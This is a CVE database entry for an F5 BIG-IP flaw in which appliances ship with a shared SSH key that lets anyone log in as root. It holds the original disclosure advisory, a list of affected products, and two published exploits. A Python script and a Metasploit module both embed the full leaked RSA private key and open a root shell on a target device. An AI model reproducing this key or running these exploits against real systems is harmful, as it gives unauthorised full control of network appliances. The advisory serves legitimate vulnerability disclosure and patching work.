Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-255 |
Category : Credentials Management Errors Weaknesses in this category are related to the management of credentials. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.8 |
|
AV:N/AC:L/Au:N/C:C/I:N/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 19064
Publication date : 2012-06-10 22h00 +00:00
Author : Florent Daigniere
EDB Verified : Yes
Matta Consulting - Matta Advisory
https://www.trustmatta.com
F5 BIG-IP remote root authentication bypass Vulnerability
Advisory ID: MATTA-2012-002
CVE reference: CVE-2012-1493
Affected platforms: BIG-IP platforms without SCCP
Version: 11.x 10.x 9.x
Date: 2012-February-16
Security risk: High
Vulnerability: F5 BIG-IP remote root authentication bypass
Researcher: Florent Daigniere
Vendor Status: Notified / Patch available
Vulnerability Disclosure Policy:
https://www.trustmatta.com/advisories/matta-disclosure-policy-01.txt
Permanent URL:
https://www.trustmatta.com/advisories/MATTA-2012-002.txt
=====================================================================
Description:
Vulnerable BIG-IP installations allow unauthenticated users to bypass
authentication and login as the 'root' user on the device.
The SSH private key corresponding to the following public key is
public and present on all vulnerable appliances:
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAvIhC5skTzxyHif/7iy3yhxuK6/OB13hjPqrskogkYFrcW8OK4VJT+5+Fx7wd4sQCnVn8rNqahw/x6sfcOMDI/Xvn4yKU4t8TnYf2MpUVr4ndz39L5Ds1n7Si1m2suUNxWbKv58I8+NMhlt2ITraSuTU0NGymWOc8+LNi+MHXdLk=
SCCP Superuser
Its fingerprint is:
71:3a:b0:18:e2:6c:41:18:4e:56:1e:fd:d2:49:97:66
=====================================================================
Impact
If successful, a malicious third party can get full control of the
device with little to no effort. The Attacker might reposition and
launch an attack against other parts of the target infrastructure
from there.
=====================================================================
Versions affected:
BIG-IP version 11.1.0 build 1943.0 tested.
The vendor reports that the following versions are patched:
9.4.8-HF5 and later
10.2.4 and later
11.0.0-HF2 and later
11.1.0-HF3 and later
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html
=====================================================================
Credits
This vulnerability was discovered and researched by Florent Daigniere
from Matta Consulting.
=====================================================================
History
16-02-12 initial discovery
22-02-12 initial attempt to contact the vendor
24-02-12 reply from David Wang, case C1062228 is open
24-02-12 draft of the advisory sent to the vendor
01-03-12 CVE-2012-1493 is assigned
06-04-12 James Affeld starts coordinating the notification effort
23-05-12 F5 notifies us that patches are ready
29-05-12 F5 sends advance notification to some customers
06-06-12 Public disclosure
=====================================================================
About Matta
Matta is a privately held company with Headquarters in London, and a
European office in Amsterdam. Established in 2001, Matta operates
in Europe, Asia, the Middle East and North America using a respected
team of senior consultants. Matta is an accredited provider of
Tiger Scheme training; conducts regular research and is the developer
behind the webcheck application scanner, and colossus network scanner.
https://www.trustmatta.com
https://www.trustmatta.com/training.html
https://www.trustmatta.com/webapp_va.html
https://www.trustmatta.com/network_va.html
=====================================================================
Disclaimer and Copyright
Copyright (c) 2012 Matta Consulting Limited. All rights reserved.
This advisory may be distributed as long as its distribution is
free-of-charge and proper credit is given.
The information provided in this advisory is provided "as is" without
warranty of any kind. Matta Consulting disclaims all warranties, either
express or implied, including the warranties of merchantability and
fitness for a particular purpose. In no event shall Matta Consulting or
its suppliers be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or
special damages, even if Matta Consulting or its suppliers have been
advised of the possibility of such damages.
Exploit Database EDB-ID : 19091
Publication date : 2012-06-11 22h00 +00:00
Author : David Kennedy (ReL1K)
EDB Verified : Yes
#!/usr/bin/python
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.secmaniac.com
#
#
import subprocess,os
filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
if os.path.isfile("priv.key"):
os.remove("priv.key")
Exploit Database EDB-ID : 19099
Publication date : 2012-06-12 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'net/ssh'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info, {
'Name' => 'F5 BIG-IP SSH Private Key Exposure',
'Version' => '$Revision$',
'Description' => %q{
F5 ships a public/private key pair on BIG-IP appliances that allows
passwordless authentication to any other BIG-IP box. Since the key is
easily retrievable, an attacker can use it to gain unauthorized remote
access as root.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'Author' => ['egypt'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],
[ 'CVE', '2012-1493' ],
[ 'OSVDB', '82780' ]
],
'DisclosureDate' => "Jun 11 2012",
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DefaultTarget' => 0,
}))
register_options(
[
# Since we don't include Tcp, we have to register this manually
Opt::RHOST(),
Opt::RPORT(22),
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
# helper methods that normally come from Tcp
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login(user)
opt_hash = {
:auth_methods => ['publickey'],
:msframework => framework,
:msfmodule => self,
:port => rport,
:key_data => [ key_data ],
:disable_agent => true,
:config => false,
:record_auth_info => true
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh_socket = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh_socket = Net::SSH.start(rhost, user, opt_hash)
end
rescue Rex::ConnectionError, Rex::AddressInUse
return :connection_error
rescue Net::SSH::Disconnect, ::EOFError
return :connection_disconnect
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return :connection_disconnect
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
rescue Net::SSH::Exception => e
return [:fail,nil] # For whatever reason.
end
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
ssh_socket = nil
return conn
else
return false
end
end
def exploit
conn = do_login("root")
if conn
print_good "Successful login"
handler(conn.lsock)
else
print_error "Login failed"
end
end
def key_data
<<EOF
-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----
EOF
end
end
Products Mentioned
Configuraton 0
F5>>Big-ip_application_security_manager >> Version 9.2.0
F5>>Big-ip_application_security_manager >> Version 9.2.0
F5>>Big-ip_application_security_manager >> Version 9.4.4
F5>>Big-ip_application_security_manager >> Version 9.4.5
F5>>Big-ip_application_security_manager >> Version 9.4.6
F5>>Big-ip_application_security_manager >> Version 9.4.7
F5>>Big-ip_application_security_manager >> Version 9.4.8
F5>>Big-ip_application_security_manager >> Version 10.0.0
F5>>Big-ip_application_security_manager >> Version 10.0.1
F5>>Big-ip_application_security_manager >> Version 10.2.3
F5>>Big-ip_application_security_manager >> Version 11.0.0
F5>>Big-ip_application_security_manager >> Version 11.0.0
F5>>Big-ip_application_security_manager >> Version 11.1.0
F5>>Big-ip_application_security_manager >> Version 11.1.0
F5>>Big-ip_global_traffic_manager >> Version *
F5>>Big-ip_global_traffic_manager >> Version 9.2.2
F5>>Big-ip_global_traffic_manager >> Version 9.4.8
F5>>Big-ip_global_traffic_manager >> Version 10.0.0
F5>>Big-ip_global_traffic_manager >> Version 10.2.3
F5>>Big-ip_global_traffic_manager >> Version 11.0.0
F5>>Big-ip_global_traffic_manager >> Version 11.0.0
F5>>Big-ip_global_traffic_manager >> Version 11.1.0
F5>>Big-ip_global_traffic_manager >> Version 11.1.0
F5>>Big-ip_local_traffic_manager >> Version *
F5>>Big-ip_local_traffic_manager >> Version 9.0.0
F5>>Big-ip_local_traffic_manager >> Version 9.4.8
F5>>Big-ip_local_traffic_manager >> Version 10.0.0
F5>>Big-ip_local_traffic_manager >> Version 10.2.3
F5>>Big-ip_local_traffic_manager >> Version 11.0.0
F5>>Big-ip_local_traffic_manager >> Version 11.0.0
F5>>Big-ip_local_traffic_manager >> Version 11.1.0
F5>>Big-ip_local_traffic_manager >> Version 11.1.0
F5>>Tmos >> Version *
F5>>Tmos >> Version 2.0
F5>>Tmos >> Version 4.0
F5>>Tmos >> Version 4.2
F5>>Tmos >> Version 4.3
F5>>Tmos >> Version 4.4
F5>>Tmos >> Version 4.5
F5>>Tmos >> Version 4.5.6
F5>>Tmos >> Version 4.5.9
F5>>Tmos >> Version 4.5.10
F5>>Tmos >> Version 4.5.11
F5>>Tmos >> Version 4.5.12
F5>>Tmos >> Version 4.6
F5>>Tmos >> Version 4.6.2
F5>>Tmos >> Version 9.0
F5>>Tmos >> Version 9.0.1
F5>>Tmos >> Version 9.0.2
F5>>Tmos >> Version 9.0.3
F5>>Tmos >> Version 9.0.4
F5>>Tmos >> Version 9.0.5
F5>>Tmos >> Version 9.1
F5>>Tmos >> Version 9.1.1
F5>>Tmos >> Version 9.1.2
F5>>Tmos >> Version 9.1.3
F5>>Tmos >> Version 9.2
F5>>Tmos >> Version 9.2.2
F5>>Tmos >> Version 9.2.3
F5>>Tmos >> Version 9.2.4
F5>>Tmos >> Version 9.2.5
F5>>Tmos >> Version 9.3
F5>>Tmos >> Version 9.3.1
F5>>Tmos >> Version 9.4
F5>>Tmos >> Version 9.4.1
F5>>Tmos >> Version 9.4.2
F5>>Tmos >> Version 9.4.3
F5>>Tmos >> Version 9.4.4
F5>>Tmos >> Version 9.4.5
F5>>Tmos >> Version 9.4.6
F5>>Tmos >> Version 9.4.7
F5>>Tmos >> Version 9.4.8
F5>>Tmos >> Version 9.6.0
F5>>Tmos >> Version 9.6.1
F5>>Tmos >> Version 10.0.0
F5>>Tmos >> Version 10.0.1
F5>>Tmos >> Version 10.1.0
F5>>Tmos >> Version 10.2.0
F5>>Big-ip_1000 >> Version *
F5>>Big-ip_11000 >> Version *
F5>>Big-ip_11050 >> Version *
F5>>Big-ip_1500 >> Version *
F5>>Big-ip_1600 >> Version *
F5>>Big-ip_2400 >> Version *
F5>>Big-ip_3400 >> Version *
F5>>Big-ip_3410 >> Version *
F5>>Big-ip_3600 >> Version *
F5>>Big-ip_3900 >> Version *
F5>>Big-ip_4100 >> Version *
F5>>Big-ip_5100 >> Version *
F5>>Big-ip_5110 >> Version *
F5>>Big-ip_6400 >> Version *
F5>>Big-ip_6800 >> Version *
F5>>Big-ip_6900 >> Version *
F5>>Big-ip_8400 >> Version *
F5>>Big-ip_8800 >> Version *
F5>>Big-ip_8900 >> Version *
F5>>Big-ip_8950 >> Version *
Configuraton 0
F5>>Enterprise_manager >> Version *
F5>>Enterprise_manager >> Version 1.0
F5>>Enterprise_manager >> Version 2.0
F5>>Enterprise_manager >> Version 2.1.0
F5>>Enterprise_manager >> Version 2.1.0
F5>>Enterprise_manager >> Version 2.2.0
F5>>Enterprise_manager >> Version 2.3.0
F5>>Enterprise_manager >> Version 2.3.0
F5>>Enterprise_manager >> Version *
F5>>Enterprise_manager >> Version 1.0
F5>>Enterprise_manager >> Version 2.0
F5>>Enterprise_manager >> Version 2.1.0
F5>>Enterprise_manager >> Version 2.1.0
F5>>Enterprise_manager >> Version 2.2.0
F5>>Enterprise_manager >> Version 2.3.0
F5>>Enterprise_manager >> Version 2.3.0
References